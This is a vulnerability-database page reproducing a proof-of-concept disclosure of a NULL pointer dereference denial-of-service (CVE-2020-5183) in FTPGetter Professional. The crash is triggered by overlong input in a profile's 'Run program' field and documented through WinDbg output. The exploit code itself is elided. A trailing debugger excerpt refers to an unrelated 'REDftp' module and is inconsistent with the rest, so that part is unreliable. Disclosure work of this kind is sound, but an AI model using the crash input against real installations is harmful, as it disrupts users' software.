Vulners
Lucene search
FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | FTPGetter Professional 5.97.0.223 - Denial of Service Exploit | 6 Jan 202000:00 | – | zdt |
 | FTPGetter Code Issue Vulnerability | 17 Feb 202000:00 | – | cnvd |
 | CVE-2020-5183 | 8 Jan 202017:19 | – | cve |
 | CVE-2020-5183 | 8 Jan 202017:19 | – | cvelist |
 | EUVD-2020-26430 | 7 Oct 202500:30 | – | euvd |
 | FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) | 6 Jan 202000:00 | – | exploitpack |
 | CVE-2020-5183 | 8 Jan 202018:15 | – | nvd |
 | CVE-2020-5183 | 8 Jan 202018:15 | – | osv |
 | FTPGetter Professional 5.97.0.223 Denial Of Service | 3 Jan 202000:00 | – | packetstorm |
 | Null pointer dereference | 8 Jan 202018:15 | – | prion |
10
# Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://www.ftpgetter.com/
# Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe
# Version: v.5.97.0.223
# Tested on: Windows 7
# CVE : N/A
==================================================================
THE BUG : NULL pointer dereference -> DOS crash
==================================================================
The FTPGetter Professional v.5.97.0.223 FTP client suffers from a
NULL pointer dereference vulnerability via the program not properly
handling user input when setting the field "Run program" under
profile properties, it triggers when executing the profile.
==================================================================
DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183
==================================================================
...
...
==================================================================
WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES
==================================================================
(b84.e88): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001
eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FTPGetter.exe -
FTPGetter!Xtermforminitialization$qqrv+0x202d74:
00855994 8b5004 mov edx,dword ptr [eax+4] ds:0023:00000004=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ftpgcore.dll -
Failed calling InternetOpenUrl, GLE=12007
FAULTING_IP:
FTPGetter!Xtermforminitialization$qqrv+202d74
00855994 8b5004 mov edx,dword ptr [eax+4]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 00000004
Attempt to read from address 00000004
FAULTING_THREAD: 00000e88
PROCESS_NAME: FTPGetter.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 00000004
READ_ADDRESS: 00000004
FOLLOWUP_IP:
FTPGetter!Xtermforminitialization$qqrv+202d74
00855994 8b5004 mov edx,dword ptr [eax+4]
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE
DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE
LAST_CONTROL_TRANSFER: from 00812591 to 00855994
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74
0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971
0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1
0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60
0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186
0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23
0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b
0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357
0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf
0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074
0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7
0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6
0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f
0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7
0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe
0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70
0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: ftpgetter!Xtermforminitialization$qqrv+202d74
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: FTPGetter
IMAGE_NAME: FTPGetter.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 5dffa0bd
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb
FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv
BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1
Followup: MachineOwner
---------
NULL pointer
FOLLOWUP_IP:
REDftp!Xtermforminitialization$qqrv+202d74
00855994 8b5004 mov edx,dword ptr [eax+4]
Stepping into and running
eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000
eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
REDftp!GetFTPValidationW+0x6e842:
004db97a 837a5400 cmp dword ptr [edx+54h],0 ds:0023:41414195=????????
==================================================================
CVE-2020-5183 is a NULL pointer dereference vulnerability
==================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jan 2020 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 25
CVSS 3.17.5
EPSS0.00965